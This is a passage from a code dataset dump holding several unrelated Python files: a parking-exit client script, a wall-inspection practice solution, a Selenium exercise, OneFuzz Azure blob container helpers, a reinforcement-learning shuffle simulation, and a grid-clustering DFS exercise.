in the system and, if so,\n# looks up the user associated with the vehicle.\n\n# This file basically handles the alerts generated in the system.\n\n\n# from ac_seguridad.models import *\nfrom mysocket import MySocket\nimport socket\nimport pdb\nimport sys\nimport requests\n# Constants.\nNUM_PUERTA = 5\nRIF = \"12345\"\nHOST = \"localhost\"\nPORT = 8000\n# 1234 restricted access\n# 0000 unrestricted access\n#pdb.set_trace()\n# Functions\ndef leer_placa():\n placa = input(\"Plate: \")\n return placa\ndef leer_ticket():\n ticket = input(\"ticket: \")\n registrado = input(\"registered (True,False): \")\n return ticket, registrado\n\n# The program starts here.\n# ref: https://docs.python.org/3/howto/sockets.html\n# Create a socket as a client.\nprint(\"Creating socket\")\n# socket_cliente = MySocket()\n# socket_cliente.connect(host=HOST, port=PORT)\nprint(\"Socket connected.\")\n\n# Send the first message:\n# Structure of the first message:\n# * RIF: filled\n# * ticket: None.\n# * placa: filled.\n# * tipo: filled ('placa_leida')\n# * puerta: filled.\n# * lectura_automatica: filled, its possible values are:\n # True: reading performed automatically\n # False: reading performed manually\n # None: the information does not apply (e.g. server-client messages)\n# * registrado: filled, true or false\n\nprint(\"Preparing message\")\nmensaje = dict()\nmensaje['estacionamiento'] = RIF\nmensaje['ticket'], mensaje['registrado'] = leer_ticket()\nmensaje['placa'] = leer_placa()\nmensaje['puerta'] = NUM_PUERTA\nmensaje['tipo'] = 'placa_leida_salida'\nmensaje['lectura_automatica']= True\n\n\n\n\nprint(\"Sending message: {}\".format(mensaje))\n# socket_cliente.sendall_json(mensaje)\n# socket_cliente.mysend(\"Hello, this is the message\\0\".encode(encoding=\"utf-8\", errors=\"strict\"))\nurl = \"http://{}:{}/manejador/manejar_mensaje/\".format(HOST,PORT)\ndata_mensaje = mensaje\nrespuesta_request = requests.post(url, data=data_mensaje)\nrespuesta = respuesta_request.json()\nprint(\"Message sent\")\n\nprint(\"Receiving response\")\n# respuesta = socket_cliente.receive()\nprint(\"Response received: {}\".format(respuesta))\n\nif (respuesta['tipo'] == \"OK_salida_estacionamiento\"):\n print(\"Green light.\")\n\nelif (respuesta['tipo'] == \"NO_ticket_placa\"):\n print(\"Red light.\")\n\nelif (respuesta['tipo'] == \"NO_ticket_pagado\"):\n print(\"Red light.\")\n\nelif (respuesta['tipo'] == \"NO_ticket_no_encontrado\"):\n print(\"Red light.\")\n\nelse:\n print(\"Invalid response\")\n\n# socket_cliente.sock.shutdown(socket.SHUT_WR)\n# 
socket_cliente.sock.close()\n","sub_path":"project/manejador/cliente_salida.py","file_name":"cliente_salida.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"340249914","text":"minimum = 10\nd = {}\n\n\n# clockwise / counterclockwise sweeps are both handled inside recurse\n\ndef recurse(weak, dist, cnt, n, clockwise):\n global minimum\n global d\n print(56, weak, dist, cnt)\n if not weak:\n if minimum > cnt:\n minimum = cnt\n return\n elif len(weak) == 1:\n if minimum > cnt+1:\n minimum = cnt +1\n return\n else:\n key = tuple(sorted(list(weak)))\n if d.get(key):\n if len(d[key]) >= len(dist):\n return\n else:\n d[key] = dist\n else:\n d[key] = dist\n\n if dist:\n friend = dist.pop()\n else:\n return\n for w in weak:\n todo = weak.copy()\n #clock\n print(12, \"friend\", friend)\n steps = range(w, w+friend+1) if clockwise else range(w , w-friend-1, -1)\n for k in steps:\n k = k % n\n print(k, end=' ')\n if k in todo:\n todo.remove(k)\n print()\n if todo == weak: # no solution down this path => this friend could not remove any weak point\n return\n else:\n recurse(todo, dist[:], cnt + 1, n, clockwise)\n\n #counter\n\n\ndef solution(n, weak, dist):\n global minimum\n global d\n minimum = 10\n d = {}\n dist = sorted(dist)\n recurse(set(weak), dist[:], 0, n, True)\n print(d)\n d = {}\n recurse(set(weak), dist[:], 0, n, False)\n print(d)\n return minimum\n\n\nprint(\"answer\", solution(12, [1, 5, 6, 10], [1, 2, 3, 4]))\nprint(\"answer\", solution(12, [1, 3, 4, 9, 10], [3, 5, 7]))\n","sub_path":"practice/programmers/외벽점검.py","file_name":"외벽점검.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"225985468","text":"from selenium import webdriver\nimport time \n\nlink = \"http://suninjuly.github.io/math.html\"\n\ntry:\n browser = webdriver.Chrome()\n browser.get(link)\n people_radio = browser.find_element_by_id(\"peopleRule\")\n people_checked = people_radio.get_attribute(\"checked\")\n\n robots_radio = browser.find_element_by_id(\"robotsRule\")\n robots_checked = robots_radio.get_attribute(\"checked\")\n\nfinally:\n # we have 30 seconds to copy the code\n time.sleep(10)\n # close the browser after all the manipulations\n browser.quit()\n\n# don't forget to leave an empty line at the end of the file","sub_path":"help.py","file_name":"help.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"113434115","text":"#!/usr/bin/env python\n#\n# Copyright (c) Microsoft Corporation.\n# Licensed under the MIT License.\n\nimport datetime\nimport logging\nimport os\nimport urllib.parse\nfrom typing import Dict, Optional, Union, cast\n\nfrom azure.common import AzureHttpError, AzureMissingResourceHttpError\nfrom azure.storage.blob import BlobPermissions, BlockBlobService, ContainerPermissions\nfrom memoization import cached\nfrom onefuzztypes.primitives import Container\n\nfrom .storage import (\n StorageType,\n choose_account,\n get_accounts,\n get_storage_account_name_key,\n)\n\n\n@cached\ndef get_blob_service(account_id: str) -> BlockBlobService:\n logging.debug(\"getting blob container (account_id: %s)\", account_id)\n account_name, account_key = get_storage_account_name_key(account_id)\n service = BlockBlobService(account_name=account_name, account_key=account_key)\n return service\n\n\ndef get_service_by_container(\n container: Container, storage_type: StorageType\n) -> Optional[BlockBlobService]:\n account = 
get_account_by_container(container, storage_type)\n if account is None:\n return None\n service = get_blob_service(account)\n return service\n\n\ndef container_exists_on_account(container: Container, account_id: str) -> bool:\n try:\n get_blob_service(account_id).get_container_properties(container)\n return True\n except AzureHttpError:\n return False\n\n\ndef container_metadata(container: Container, account: str) -> Optional[Dict[str, str]]:\n try:\n result = get_blob_service(account).get_container_metadata(container)\n return cast(Dict[str, str], result)\n except AzureHttpError:\n pass\n return None\n\n\ndef get_account_by_container(\n container: Container, storage_type: StorageType\n) -> Optional[str]:\n accounts = get_accounts(storage_type)\n\n # check secondary accounts first by searching in reverse.\n #\n # By implementation, the primary account is specified first, followed by\n # any secondary accounts.\n #\n # Secondary accounts, if they exist, are preferred for containers and have\n # increased IOP rates, this should be a slight optimization\n for account in reversed(accounts):\n if container_exists_on_account(container, account):\n return account\n return None\n\n\ndef container_exists(container: Container, storage_type: StorageType) -> bool:\n return get_account_by_container(container, storage_type) is not None\n\n\ndef get_containers(storage_type: StorageType) -> Dict[str, Dict[str, str]]:\n containers: Dict[str, Dict[str, str]] = {}\n\n for account_id in get_accounts(storage_type):\n containers.update(\n {\n x.name: x.metadata\n for x in get_blob_service(account_id).list_containers(\n include_metadata=True\n )\n }\n )\n\n return containers\n\n\ndef get_container_metadata(\n container: Container, storage_type: StorageType\n) -> Optional[Dict[str, str]]:\n account = get_account_by_container(container, storage_type)\n if account is None:\n return None\n\n return container_metadata(container, account)\n\n\ndef create_container(\n container: Container,\n storage_type: StorageType,\n metadata: Optional[Dict[str, str]],\n) -> Optional[str]:\n service = get_service_by_container(container, storage_type)\n if service is None:\n account = choose_account(storage_type)\n service = get_blob_service(account)\n try:\n service.create_container(container, metadata=metadata)\n except AzureHttpError as err:\n logging.error(\n (\n \"unable to create container. 
account: %s \"\n \"container: %s metadata: %s - %s\"\n ),\n account,\n container,\n metadata,\n err,\n )\n return None\n\n return get_container_sas_url_service(\n container,\n service,\n read=True,\n add=True,\n create=True,\n write=True,\n delete=True,\n list=True,\n )\n\n\ndef delete_container(container: Container, storage_type: StorageType) -> bool:\n accounts = get_accounts(storage_type)\n for account in accounts:\n service = get_blob_service(account)\n if bool(service.delete_container(container)):\n return True\n\n return False\n\n\ndef get_container_sas_url_service(\n container: Container,\n service: BlockBlobService,\n *,\n read: bool = False,\n add: bool = False,\n create: bool = False,\n write: bool = False,\n delete: bool = False,\n list: bool = False,\n) -> str:\n expiry = datetime.datetime.utcnow() + datetime.timedelta(days=30)\n permission = ContainerPermissions(read, add, create, write, delete, list)\n\n sas_token = service.generate_container_shared_access_signature(\n container, permission=permission, expiry=expiry\n )\n\n url = service.make_container_url(container, sas_token=sas_token)\n url = url.replace(\"?restype=container&\", \"?\")\n return str(url)\n\n\ndef get_container_sas_url(\n container: Container,\n storage_type: StorageType,\n *,\n read: bool = False,\n add: bool = False,\n create: bool = False,\n write: bool = False,\n delete: bool = False,\n list: bool = False,\n) -> str:\n service = get_service_by_container(container, storage_type)\n if not service:\n raise Exception(\"unable to create container sas for missing container\")\n\n return get_container_sas_url_service(\n container,\n service,\n read=read,\n add=add,\n create=create,\n write=write,\n delete=delete,\n list=list,\n )\n\n\ndef get_file_sas_url(\n container: Container,\n name: str,\n storage_type: StorageType,\n *,\n read: bool = False,\n add: bool = False,\n create: bool = False,\n write: bool = False,\n delete: bool = False,\n list: bool = False,\n days: int = 30,\n hours: int = 0,\n minutes: int = 0,\n) -> str:\n service = get_service_by_container(container, storage_type)\n if not service:\n raise Exception(\"unable to find container: %s - %s\" % (container, storage_type))\n\n expiry = datetime.datetime.utcnow() + datetime.timedelta(\n days=days, hours=hours, minutes=minutes\n )\n permission = BlobPermissions(read, add, create, write, delete, list)\n\n sas_token = service.generate_blob_shared_access_signature(\n container, name, permission=permission, expiry=expiry\n )\n\n url = service.make_blob_url(container, name, sas_token=sas_token)\n return str(url)\n\n\ndef save_blob(\n container: Container,\n name: str,\n data: Union[str, bytes],\n storage_type: StorageType,\n) -> None:\n service = get_service_by_container(container, storage_type)\n if not service:\n raise Exception(\"unable to find container: %s - %s\" % (container, storage_type))\n\n if isinstance(data, str):\n service.create_blob_from_text(container, name, data)\n elif isinstance(data, bytes):\n service.create_blob_from_bytes(container, name, data)\n\n\ndef get_blob(\n container: Container, name: str, storage_type: StorageType\n) -> Optional[bytes]:\n service = get_service_by_container(container, storage_type)\n if not service:\n return None\n\n try:\n blob = service.get_blob_to_bytes(container, name).content\n return cast(bytes, blob)\n except AzureMissingResourceHttpError:\n return None\n\n\ndef blob_exists(container: Container, name: str, storage_type: StorageType) -> bool:\n service = get_service_by_container(container, 
storage_type)\n if not service:\n return False\n\n try:\n service.get_blob_properties(container, name)\n return True\n except AzureMissingResourceHttpError:\n return False\n\n\ndef delete_blob(container: Container, name: str, storage_type: StorageType) -> bool:\n service = get_service_by_container(container, storage_type)\n if not service:\n return False\n\n try:\n service.delete_blob(container, name)\n return True\n except AzureMissingResourceHttpError:\n return False\n\n\ndef auth_download_url(container: Container, filename: str) -> str:\n instance = os.environ[\"ONEFUZZ_INSTANCE\"]\n return \"%s/api/download?%s\" % (\n instance,\n urllib.parse.urlencode({\"container\": container, \"filename\": filename}),\n )\n","sub_path":"src/api-service/__app__/onefuzzlib/azure/containers.py","file_name":"containers.py","file_ext":"py","file_size_in_byte":8385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"506180651","text":"import torch\r\nimport getopt\r\nimport sys\r\nimport csv\r\nimport os\r\nimport simulation as sim\r\nimport math\r\nfrom random import randint\r\nfrom analysis import gData, MODE_MAP\r\nfrom tqdm import tqdm\r\nfrom numpy.random import choice\r\nfrom torch.autograd import Variable\r\nimport pandas as pd\r\nimport analysis\r\n\r\nimport numpy as np\r\nfrom scipy.interpolate import pchip_interpolate\r\nimport matplotlib.pyplot as plt\r\nfrom analysis import save_plt_figure\r\n\r\nfrom mdp import MDP\r\nfrom sarsa import SARSA\r\nfrom forward import FORWARD\r\nfrom arbitrator import BayesRelEstimator, AssocRelEstimator, Arbitrator\r\nimport dill as pickle # see https://stackoverflow.com/questions/25348532/can-python-pickle-lambda-functions\r\nimport random\r\n\r\nfrom mdp import MDP\r\nfrom ddqn import DoubleDQN\r\nfrom sarsa import SARSA\r\nfrom forward import FORWARD\r\nfrom arbitrator import BayesRelEstimator, AssocRelEstimator, Arbitrator\r\nfrom analysis import gData, RESULTS_FOLDER, COLUMNS, DETAIL_COLUMNS\r\nfrom common import makedir\r\nimport analysis\r\nfrom math import ceil\r\n#from main import MODE_LIST\r\n# preset constants\r\nMDP_STAGES = 2\r\nTOTAL_EPISODES = 200\r\nTRIALS_PER_EPISODE = 80\r\nSPE_LOW_THRESHOLD = 0.3#0.3\r\nSPE_HIGH_THRESHOLD = 0.45#0.5\r\nRPE_LOW_THRESHOLD = 4\r\nRPE_HIGH_THRESHOLD = 9 #10\r\nMF_REL_HIGH_THRESHOLD = 0.8\r\nMF_REL_LOW_THRESHOLD = 0.5\r\nMB_REL_HIGH_THRESHOLD = 0.7\r\nMB_REL_LOW_THRESHOLD = 0.3\r\nCONTROL_REWARD = 1\r\nCONTROL_REWARD_BIAS = 0\r\nINIT_CTRL_INPUT = [10, 0.5]\r\nDEFAULT_CONTROL_MODE = 'max-spe'\r\nCONTROL_MODE = DEFAULT_CONTROL_MODE\r\nCTRL_AGENTS_ENABLED = True\r\nRPE_DISCOUNT_FACTOR = 0.003\r\nACTION_PERIOD = 3\r\nSTATIC_CONTROL_AGENT = False\r\nENABLE_PLOT = True\r\nDISABLE_C_EXTENSION = False\r\nLEGACY_MODE = False\r\nMORE_CONTROL_INPUT = True\r\nSAVE_CTRL_RL = False\r\nPMB_CONTROL = False\r\nTASK_TYPE = 2020\r\nMF_ONLY = False\r\nMB_ONLY = False\r\nReproduce_BHV = False\r\nsaved_policy_path = ''\r\nSession_block = False\r\nmode202010 = False\r\nDECAY_RATE = 0.5\r\nturn_off_tqdm = False\r\nCONTROL_resting = 99 #Intial duration for CONTROL agent resting\r\nmax_sbj = 82\r\n\r\nRESET = False\r\nSAVE_LOG_Q_VALUE = False\r\nMIXED_RANDOM_MODE = False\r\nRANDOM_MODE_LIST = ['min-rpe', 'max-rpe', 'min-spe', 'max-spe']\r\n\r\n\r\nerror_reward_map = {\r\n # x should be a 4-tuple: rpe, spe, mf_rel, mb_rel\r\n # x should be a 5-tuple: rpe, spe, mf_rel, mb_rel, PMB - updated\r\n 'min-rpe' : (lambda x: x[0] < RPE_LOW_THRESHOLD),\r\n 'max-rpe' : (lambda x: x[0] > 
RPE_HIGH_THRESHOLD),\r\n 'min-spe' : (lambda x: x[1] < SPE_LOW_THRESHOLD),\r\n 'max-spe' : (lambda x: x[1] > SPE_HIGH_THRESHOLD),\r\n 'min-mf-rel' : (lambda x: x[2] < MF_REL_LOW_THRESHOLD),\r\n 'max-mf-rel' : (lambda x: x[2] > MF_REL_HIGH_THRESHOLD),\r\n 'min-mb-rel' : (lambda x: x[3] < MB_REL_LOW_THRESHOLD),\r\n 'max-mb-rel' : (lambda x: x[3] > MB_REL_HIGH_THRESHOLD),\r\n 'min-rpe-min-spe' : lambda x: error_reward_map['min-rpe'](x) and error_reward_map['min-spe'](x),\r\n 'max-rpe-max-spe' : lambda x: error_reward_map['max-rpe'](x) and error_reward_map['max-spe'](x),\r\n 'min-rpe-max-spe' : lambda x: error_reward_map['min-rpe'](x) and error_reward_map['max-spe'](x),\r\n 'max-rpe-min-spe' : lambda x: error_reward_map['max-rpe'](x) and error_reward_map['min-spe'](x),\r\n 'random' : lambda x: 0\r\n}\r\n\r\n\r\ndef create_lst(x):\r\n return [x] * TRIALS_PER_EPISODE\r\n\r\nstatic_action_map = {\r\n 'min-rpe' : create_lst(0),\r\n 'max-rpe' : create_lst(3),\r\n 'min-spe' : create_lst(0),\r\n 'max-spe' : create_lst(1),\r\n 'min-rpe-min-spe' : create_lst(0),\r\n 'max-rpe-max-spe' : create_lst(3),\r\n 'min-rpe-max-spe' : create_lst(1),\r\n 'max-rpe-min-spe' : create_lst(2)\r\n}\r\n\r\ndef error_to_reward(error, PMB=0 , mode=DEFAULT_CONTROL_MODE, bias=CONTROL_REWARD_BIAS):\r\n \"\"\"Compute reward for the task controller. Based on the input scenario (mode), the reward function is determined from the error_reward_map dict.\r\n Args:\r\n error (float list): list with player agent's internal states. Current setting: RPE/SPE/MF-Rel/MB-Rel/PMB\r\n For the error argument, please check the error_reward_map\r\n PMB (float): PMB value of player agents. Currently duplicated with error argument.\r\n mode (string): type of scenario\r\n\r\n Return:\r\n action (int): action to take by human agent\r\n \"\"\"\r\n if TASK_TYPE == 2019:\r\n try:\r\n cmp_func = error_reward_map[mode]\r\n except KeyError:\r\n print(\"Warning: control mode {0} not found, use default mode {1}\".format(mode, DEFAULT_CONTROL_MODE))\r\n cmp_func = error_reward_map[DEFAULT_CONTROL_MODE]\r\n\r\n return cmp_func(error)\r\n elif TASK_TYPE == 2020 or TASK_TYPE == 2021:\r\n if mode == 'min-rpe':\r\n reward = (40 - error[0]) * 3\r\n elif mode == 'max-rpe':\r\n reward = error[0] * 10\r\n elif mode == 'min-spe':\r\n reward = (1 - error[1])*150\r\n elif mode == 'max-spe':\r\n reward = error[1]*200\r\n elif mode == 'min-rpe-min-spe':\r\n reward = ((40 - error[0]) * 3 + (1 - error[1]) * 150 ) /2\r\n elif mode == 'max-rpe-max-spe':\r\n reward = ((error[0]) * 10 + (error[1]) * 100) /2\r\n elif mode == 'min-rpe-max-spe':\r\n reward = ((40 - error[0]) * 3 + (error[1]) * 200) /2\r\n elif mode == 'max-rpe-min-spe':\r\n reward = ((error[0]) * 10 + (1 - error[1]) * 150) /2\r\n elif mode == 'random' :\r\n reward = 0\r\n\r\n if PMB_CONTROL:\r\n reward = reward-60*PMB\r\n\r\n return reward # -60*PMB\r\n# if cmp_func(error):\r\n# if CONTROL_REWARD < 0.5 :\r\n# return CONTROL_REWARD + bias\r\n# else :\r\n# return CONTROL_REWARD * ((2-PMB*2)**0.5) + bias\r\n# #return CONTROL_REWARD*(2-2*PMB) + bias\r\n# else:\r\n# return bias\r\n\r\ndef shuffle_simulation(CONTROL_MODE = 'max-rpe', policy_sbj_indx = 0):\r\n pol_list = ['max-spe','min-spe','max-rpe','min-rpe','min-rpe-min-spe','max-rpe-max-spe','min-rpe-max-spe','max-rpe-min-spe']\r\n pol = pol_list.index(CONTROL_MODE)\r\n\r\n params = []\r\n f = open('regdata.csv')\r\n data = f.readlines()\r\n for sbj in data:\r\n params.append(sbj.split(',')[:-1])\r\n f.close()\r\n for ii in range(len(params)):\r\n for jj in 
range(len(params[ii])):\r\n params[ii][jj] = float(params[ii][jj])\r\n\r\n\r\n pol_filename = 'history_results/Analysis-Object-'+CONTROL_MODE+'-{0:02d}'.format(policy_sbj_indx)+file_suffix+'.pkl'\r\n\r\n with open(pol_filename,'rb') as f:\r\n pol_sbj_data = pickle.load(f)\r\n NUM_EPISODES, NUM_FULL_FEATS_DATA = pol_sbj_data.data[pol_list[pol]][0].shape\r\n NUM_FULL_TRIALS, NUM_FULL_FEATS_DETAIL = pol_sbj_data.detail[pol_list[pol]][0].shape\r\n TRIALS_PER_EPISODE = ceil(NUM_FULL_TRIALS / NUM_EPISODES)\r\n PMB_shuffle=np.zeros((max_sbj,TOTAL_EPISODES*TRIALS_PER_EPISODE))\r\n RPE_shuffle=np.zeros((max_sbj,TOTAL_EPISODES*TRIALS_PER_EPISODE))\r\n SPE_shuffle = np.zeros((max_sbj, TOTAL_EPISODES*TRIALS_PER_EPISODE))\r\n Reward_shuffle=np.zeros((max_sbj,TOTAL_EPISODES*TRIALS_PER_EPISODE))\r\n Score_shuffle = np.zeros((max_sbj, TOTAL_EPISODES * TRIALS_PER_EPISODE))\r\n\r\n opt_index = pol_sbj_data.data[pol_list[pol]][0]['ctrl_reward'].loc[\r\n 0.2 * len(pol_sbj_data.data[pol_list[pol]][0]):].idxmax()\r\n opt_pol = pol_sbj_data.detail[pol_list[pol]][0]['action'].loc[\r\n opt_index * TRIALS_PER_EPISODE - TRIALS_PER_EPISODE:opt_index * TRIALS_PER_EPISODE - 1]\r\n\r\n\r\n for affected_sbj_indx in range(max_sbj):\r\n env = MDP(2, more_control_input=True, legacy_mode=False, task_type=TASK_TYPE)\r\n # initialize human agent one time\r\n sarsa = SARSA(env.action_space[MDP.HUMAN_AGENT_INDEX], env, learning_rate=params[affected_sbj_indx][5]) # SARSA model-free learner\r\n forward = FORWARD(env.observation_space[MDP.HUMAN_AGENT_INDEX],\r\n env.action_space[MDP.HUMAN_AGENT_INDEX],\r\n env.state_reward_func, env.output_states_offset, env.reward_map_func,\r\n learning_rate=params[affected_sbj_indx][5], disable_cforward=True) # forward model-based learner\r\n arb = Arbitrator(AssocRelEstimator(params[affected_sbj_indx][1], env.max_rpe),\r\n BayesRelEstimator(thereshold=params[affected_sbj_indx][0]),\r\n amp_mb_to_mf=params[affected_sbj_indx][2], amp_mf_to_mb=params[affected_sbj_indx][3], temperature=params[affected_sbj_indx][4], MB_ONLY = MB_ONLY, MF_ONLY= MF_ONLY)\r\n # register in the communication controller\r\n env.agent_comm_controller.register('model-based', forward)\r\n for episode in tqdm(range(TOTAL_EPISODES)):\r\n if episode > CONTROL_resting:\r\n env = MDP(MDP_STAGES, more_control_input=MORE_CONTROL_INPUT, legacy_mode=LEGACY_MODE,\r\n task_type=TASK_TYPE)\r\n sarsa = sarsa_save\r\n forward = forward_save\r\n arb = arb_save\r\n env.reward_map = env.reward_map_copy.copy()\r\n env.output_states = env.output_states_copy.copy()\r\n cum_d_p_mb = cum_p_mb = cum_mf_rel = cum_mb_rel = cum_rpe = cum_spe = cum_reward = cum_score = 0\r\n cum_ctrl_act = np.zeros(MDP.NUM_CONTROL_ACTION)\r\n arb.episode_number = episode\r\n arb.CONTROL_resting = CONTROL_resting\r\n human_action_list_episode = []\r\n# env = MDP(2, more_control_input=True, legacy_mode=False, task_type=TASK_TYPE)\r\n# env.agent_comm_controller.register('model-based', forward)\r\n for trial in range(TRIALS_PER_EPISODE):\r\n block_indx = trial // int(TRIALS_PER_EPISODE / 4)\r\n if trial % TRIALS_PER_EPISODE == 0:\r\n if episode > CONTROL_resting:\r\n env = MDP(MDP_STAGES, more_control_input=MORE_CONTROL_INPUT, legacy_mode=LEGACY_MODE,\r\n task_type=TASK_TYPE)\r\n env.reward_map = env.reward_map_copy.copy()\r\n env.output_states = env.output_states_copy.copy()\r\n if episode <= CONTROL_resting:\r\n env = MDP(MDP_STAGES, more_control_input=MORE_CONTROL_INPUT, legacy_mode=LEGACY_MODE,\r\n task_type=TASK_TYPE)\r\n env.bwd_idf = -1\r\n t_d_p_mb = t_p_mb = 
t_mf_rel = t_mb_rel = t_rpe = t_spe = t_reward = t_score = 0\r\n game_terminate = False\r\n human_obs, control_obs_frag = env.reset()\r\n #control_obs = np.append(control_obs_frag, [10, 0.5])\r\n if episode > CONTROL_resting:\r\n \"\"\"control agent choose action\"\"\"\r\n control_action = int(opt_pol[opt_index * TRIALS_PER_EPISODE - TRIALS_PER_EPISODE+ trial])\r\n else:\r\n control_action = 0\r\n cum_ctrl_act[control_action] += 1\r\n \"\"\"control act on environment\"\"\"\r\n if TASK_TYPE == 2019:\r\n if control_action == 3:\r\n if env.is_flexible == 1:\r\n arb.p_mb = 0.8\r\n arb.p_mf = 0.2\r\n else:\r\n arb.p_mb = 0.2\r\n arb.p_mf = 0.8\r\n elif TASK_TYPE == 2021:\r\n if control_action == 2:\r\n if env.is_flexible == 1:\r\n arb.p_mb = 0.8\r\n arb.p_mf = 0.2\r\n else:\r\n arb.p_mb = 0.2\r\n arb.p_mf = 0.8\r\n _, _, _, _ = env.step([MDP.CONTROL_AGENT_INDEX, control_action])\r\n\r\n current_game_step = 0\r\n\r\n while not game_terminate:\r\n \"\"\"human choose action\"\"\"\r\n if episode < CONTROL_resting:\r\n human_action = randint(0, 1)\r\n else:\r\n human_action = arb.action(sarsa.get_Q_values(human_obs), forward.get_Q_values(human_obs))\r\n #print(\"human action : \", human_action)\r\n\r\n \"\"\"human act on environment\"\"\"\r\n next_human_obs, human_reward, game_terminate, next_control_obs_frag \\\r\n = env.step((MDP.HUMAN_AGENT_INDEX, human_action))\r\n\r\n \"\"\"update human agent\"\"\"\r\n spe = forward.optimize(human_obs, human_reward, human_action, next_human_obs, env)\r\n next_human_action = arb.action(sarsa.get_Q_values(human_obs), forward.get_Q_values(next_human_obs)) # required by models like SARSA\r\n if env.is_flexible == 1: #flexible goal condition\r\n rpe = sarsa.optimize(human_reward, human_action, next_human_action, human_obs, next_human_obs)\r\n else: # specific goal condition human_reward should be normalized to sarsa\r\n if human_reward > 0: # if reward is 10, 20, 40\r\n rpe = sarsa.optimize(40, human_action, next_human_action, human_obs, next_human_obs)\r\n else:\r\n rpe = sarsa.optimize(0, human_action, next_human_action, human_obs, next_human_obs)\r\n\r\n mf_rel, mb_rel, p_mb, d_p_mb = arb.add_pe(rpe, spe)\r\n t_d_p_mb += d_p_mb\r\n t_p_mb += p_mb\r\n t_mf_rel += mf_rel\r\n t_mb_rel += mb_rel\r\n t_rpe += abs(rpe)\r\n t_spe += spe\r\n t_score += human_reward # if not the terminal state, human_reward is 0, so simply add here is fine\r\n\r\n \"\"\"iterators update\"\"\"\r\n human_obs = next_human_obs\r\n if current_game_step == 0:\r\n rpe1 = rpe\r\n else:\r\n rpe2 = rpe\r\n current_game_step += 1\r\n\r\n # calculation after one trial\r\n d_p_mb, p_mb, mf_rel, mb_rel, rpe, spe = list(map(lambda x: x / 2, [\r\n t_d_p_mb, t_p_mb, t_mf_rel, t_mb_rel, t_rpe, t_spe])) # map to average value\r\n cum_d_p_mb += d_p_mb\r\n cum_p_mb += p_mb\r\n cum_mf_rel += mf_rel\r\n cum_mb_rel += mb_rel\r\n cum_rpe += rpe\r\n cum_spe += spe\r\n cum_score += t_score\r\n\r\n \"\"\"update control agent\"\"\"\r\n t_reward = error_to_reward((rpe, spe, mf_rel, mb_rel), p_mb, CONTROL_MODE)\r\n cum_reward += t_reward\r\n #next_control_obs = np.append(next_control_obs_frag, [rpe, spe])\r\n\r\n #control_obs_extra = [rpe, spe]\r\n PMB_shuffle[affected_sbj_indx][episode*TRIALS_PER_EPISODE+trial]=p_mb\r\n RPE_shuffle[affected_sbj_indx][episode*TRIALS_PER_EPISODE+trial]=rpe\r\n SPE_shuffle[affected_sbj_indx][episode * TRIALS_PER_EPISODE + trial] = spe\r\n Reward_shuffle[affected_sbj_indx][episode * TRIALS_PER_EPISODE + trial] = t_reward\r\n Score_shuffle[affected_sbj_indx][episode * TRIALS_PER_EPISODE + 
trial] = t_score\r\n\r\n\r\n        if episode == CONTROL_resting - 1:\r\n            arb_save = arb\r\n            sarsa_save = sarsa\r\n            forward_save = forward\r\n\r\n    save_pol_list = ['max-spe','min-spe','max-rpe','min-rpe','min-rpe-min-spe','max-rpe-max-spe','min-rpe-max-spe','max-rpe-min-spe']\r\n    save_file_head = 'history_results/SUB{0:03d}_SHUFFLE_'.format(policy_sbj_indx) + save_pol_list[pol_list.index(CONTROL_MODE)]+file_suffix\r\n    np.save(save_file_head+'_PMB.npy',PMB_shuffle)\r\n    np.save(save_file_head+'_RPE.npy',RPE_shuffle)\r\n    np.save(save_file_head + '_SPE.npy', SPE_shuffle)\r\n    np.save(save_file_head+'_RWD.npy',Reward_shuffle)\r\n    np.save(save_file_head + '_SCR.npy', Score_shuffle)\r\n\r\n\r\nif __name__ == '__main__':\r\n    short_opt = \"hdn:\"\r\n    # every long option handled below must be registered here, or getopt raises GetoptError\r\n    long_opt = [\"policy-sbj=\", \"ctrl-mode=\", \"task-type=\", \"file-suffix=\", \"MF_ONLY=\", \"MB_ONLY=\"]\r\n    try:\r\n        opts, args = getopt.getopt(sys.argv[1:], short_opt, long_opt)\r\n    except getopt.GetoptError as err:\r\n        print(err)\r\n        sys.exit(2)\r\n    for o, a in opts:\r\n        if o == \"--policy-sbj\":\r\n            policy_sbj_indx = int(a)\r\n        elif o == \"--ctrl-mode\":\r\n            CONTROL_MODE = a\r\n        elif o == \"--task-type\":\r\n            TASK_TYPE = int(a)\r\n        elif o == \"--file-suffix\":\r\n            file_suffix = a\r\n            print(file_suffix)\r\n        elif o == \"--MF_ONLY\":\r\n            MF_ONLY = bool(a)\r\n        elif o == \"--MB_ONLY\":\r\n            MB_ONLY = bool(a)\r\n        else:\r\n            assert False, \"unhandled option\"\r\n\r\n    shuffle_simulation(CONTROL_MODE = CONTROL_MODE, policy_sbj_indx = policy_sbj_indx)\r\n","sub_path":"shuffle_simulation.py","file_name":"shuffle_simulation.py","file_ext":"py","file_size_in_byte":17133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"561439716","text":"import sys\nsys.stdin=open('danG.txt', 'r')\n\n\ndef dfs(a, b):\n    global cnt, num, rocol\n    base[a][b] = cnt\n    num += 1\n    for dir in range(4):\n        aa = a+dy[dir]\n        bb = b+dx[dir]\n        if -1 < aa < rocol and -1 < bb < rocol:\n            if base[aa][bb] == 1:\n                dfs(aa, bb)\n\n\ndy = [-1, 1, 0, 0]\ndx = [0, 0, -1, 1]\nrocol = int(input())\nbase = [0]*rocol\ncnt = 1\nnum = 0\nnum_list = []\nfor i in range(rocol):\n    base[i] = list(map(int, input()))\nfor ii in range(rocol):\n    for jj in range(rocol):\n        if base[ii][jj] == 1:\n            cnt += 1\n            dfs(ii, jj)\n            num_list.append(num)\n            num = 0\nprint(cnt-1)\nnum_list.sort()\nfor nn in range(len(num_list)):\n    print(num_list[nn])","sub_path":"algorithm_practice/s2s3_ad_study/dfsbfs/2667_danG.py","file_name":"2667_danG.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} 